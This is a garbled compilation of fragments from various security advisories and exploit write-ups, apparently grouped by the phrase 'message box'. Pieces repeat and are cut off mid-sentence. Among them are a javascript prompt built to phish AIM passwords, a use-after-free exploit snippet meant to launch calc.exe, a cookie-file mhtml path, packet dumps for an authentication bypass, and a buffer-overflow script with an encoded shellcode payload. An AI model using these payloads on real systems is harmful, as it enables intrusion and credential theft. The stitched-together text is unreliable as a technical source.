message box
Details:
========
A Buffer Overflow vulnerability is detected on Yahoos IMessenger v11.5 client software.
The bug is located on the drag & drop message box function of the software when processing special crafted file transfers.
The vulnerability allows an local attacker to crash down(stable) the software & all bound yahoo components.
Vulnerable Module(s):
[+] Drag & Drop - Message Box
tags only. JavaScript statements may also be executed through the use of
other HTML controls and some of the attack vectors that we mention do not
even rely on JavaScript for successful exploitation.
The following proof-of-concept code will display a prompt box to the
victim, requesting to type in the victim's AIM credentials. It will look
authentic due to the fact that the message box is not part of the text
message window:
- -- begin code --
<img src='javascript:var passwd=window.prompt("You have been
disconnected from the network.\nPlease re-enter your password to
tags only. JavaScript statements may also be executed through the use of
other HTML controls and some of the attack vectors that we mention do not
even rely on JavaScript for successful exploitation.
The following proof-of-concept code will display a prompt box to the
victim, requesting to type in the victim's AIM credentials. It will look
authentic due to the fact that the message box is not part of the text
message window:
- -- begin code --
<img src='javascript:var passwd=window.prompt("You have been
disconnected from the network.\nPlease re-enter your password to
for its protocol without any encryption or authentication. This can be
abused to leak the username of a currently logged on user. Disclosed
usernames can be used in further attacks on different services and/or
ease bruteforcing of user accounts.
Furthermore, if ELBA receives an invalid serialized method name an
assertation fails and a message box with an attacker controlled value
is displayed and the user is forced to shut down the application. This
can be abused to disrupt the work of a user, or as a part of a social
engineering attack as it is possible to make the message box display a
message controllable by the attacker.
Accept-Encoding: gzip
Accept: */*
Content-Type: text/plain
User-Agent: ZoneAlarm/8.0.020.000 (oem-1025; en-US) ZSP/2.2
- ZoneAlarm 8's TrueVector Component crashes with a message box, minidump file in Temp and on closing the message box, it restarts after a few moments
- ZoneAlarm leaves the system unprotected (HIDS module alone) till the time TrueVector component is back.
- Demonstration Video links :
}
//verify we overwrote the deleted option object successfully
if(readmem(optadr) != strtoint(fakeobj.substr(0,2))) return 0;
alert("success, calc.exe should start once you close this message box");
//now do something with the corrupted option object
corruptedoption.parentNode.click();
}
The code above checks for an error condition based on the value of an
Error Code field in the inbound network packet. An error condition is
explicitly handled if the Error Code value is less than or equal to -1,
in which case a MessageBox with a corresponding descriptive error string
will be presented to the user. However, by crafting a packet with any
negative value in the Error Code field different from -1 the lookup for
the corresponding error string will fail triggering a non-recoverable
error and thus terminating the server process.
The Safari version running on the iPhone supports handling the TEL [1]
protocol through launching the telephony/dialer application. This is
done by passing the provided phone number to the telephony
application. Under normal conditions, loading a tel: URI results in a
message box asking the user's permission to call the given number. The
user is presented with the simple choice to either press call or
cancel.
A TEL URI can be opened automatically if the TEL URI is used as the
source of an HTML iframe or frame, as the URL of a meta refresh, as
By using a positive value major than 0 and lower than the total number
of elements is possible to cause a problem during the freeing of the
allocated object.
The provided proof-of-concept demonstrates the possibility of executing
code immediately after the acknoledgement of the initial message box
when is called FXSCOVER!CDrawDoc::Remove by
FXSCOVER!CDrawDoc::DeleteContents.
Modifications:
00005098 FE CC // code execution starts from here
>>
>> The Safari version running on the iPhone supports handling the TEL [1]
>> protocol through launching the telephony/dialer application. This is
>> done by passing the provided phone number to the telephony
>> application. Under normal conditions, loading a tel: URI results in a
>> message box asking the user's permission to call the given number. The
>> user is presented with the simple choice to either press call or
>> cancel.
>>
>> A TEL URI can be opened automatically if the TEL URI is used as the
>> source of an HTML iframe or frame, as the URL of a meta refresh, as
>>>
>>> The Safari version running on the iPhone supports handling the TEL [1]
>>> protocol through launching the telephony/dialer application. This is
>>> done by passing the provided phone number to the telephony
>>> application. Under normal conditions, loading a tel: URI results in a
>>> message box asking the user's permission to call the given number. The
>>> user is presented with the simple choice to either press call or
>>> cancel.
>>>
>>> A TEL URI can be opened automatically if the TEL URI is used as the
>>> source of an HTML iframe or frame, as the URL of a meta refresh, as
mhtml:\\127.0.0.1\C$\Documents%20and%20Settings\USERNAME\Cookies\evilCookie.txt
- -----------/
The contents of your boot.ini file will be displayed in a message box
(or could be programmatically sent to a remote web site).
Note that if you reference this file in a different way than using the
UNC, the privileged VB script code (which requires local machine zone
permissions to execute) won't execute. For example, accessing the file
- -----/
The code above checks for an error condition based on the value of an
Error Code field in the inbound network packet. An error condition is
explicitly handled if the Error Code value is less or equal than -1 in
which case a MessageBox with a corresponding descriptive error string
will be presented to the user. However by crafting a packet with any
negative value in the Error Code field different that -1 the lookup for
the corresponding error string will fail triggering a non-recoverable
error and thus terminating the server process.
2. Authentication bypass
Remote attacker can log in into RDBMS use existing or not existing UserID
without password. It is possible because authentication process is going
on client side. When password incorrect client application reset connection
with server and show message box. If password is correct, client send to
server UserID which he will be to use in RDBMS.
Packet 3. From client to server, when password for UserID TEST2 is correct:
0x0000 00 00 00 00 00 02 00 00-00 00 00 01 08 00 45 00 ..............E.
>
> The Safari version running on the iPhone supports handling the TEL [1]
> protocol through launching the telephony/dialer application. This is
> done by passing the provided phone number to the telephony
> application. Under normal conditions, loading a tel: URI results in a
> message box asking the user's permission to call the given number. The
> user is presented with the simple choice to either press call or
> cancel.
>
> A TEL URI can be opened automatically if the TEL URI is used as the
> source of an HTML iframe or frame, as the URL of a meta refresh, as
// The DLL self-registers as a Browser Helper Object, but it
// doesn't actually do anything BHO-like -- it just hooks
// MSHTML.DLL during DllGetClassObject, then "fails." Being a
// BHO is a convenient way to get loaded into Internet Explorer.
// (Note that it may also load into Explorer.) If it can't
// hook the system's MSHTML.DLL, it will display a message box
// informing the user of the failure.
//
// NO WARRANTIES. Use at your own risk. Redistribution of this
// source code in its original, unmodified form is permitted.
//
# Version: 4.9.0.006
# Tested on: Windows XP SP3 En
buffersize = 205
nopsled = "\x90" * 4
# Custom MessageBox
# x86/shikata_ga_nai succeeded with size 104 (iteration=1)
shellcode = ("\xd9\xe5\x29\xc9\xbe\xe0\xc8\xa6\x9f\xb1\x14\xd9\x74\x24\xf4"
"\x5f\x83\xc7\x04\x31\x77\x14\x03\x77\xf4\x2a\x53\xf7\x8c\x8a"
"\xbc\x08\x04\xac\xd9\x4a\xbb\x5a\x47\x38\x30\xfa\xef\xd1\xdb"
"\xdc\xa2\x45\x60\x68\x4e\xe2\xef\x71\xd8\x6f\x8b\x54\x19\x18"
|
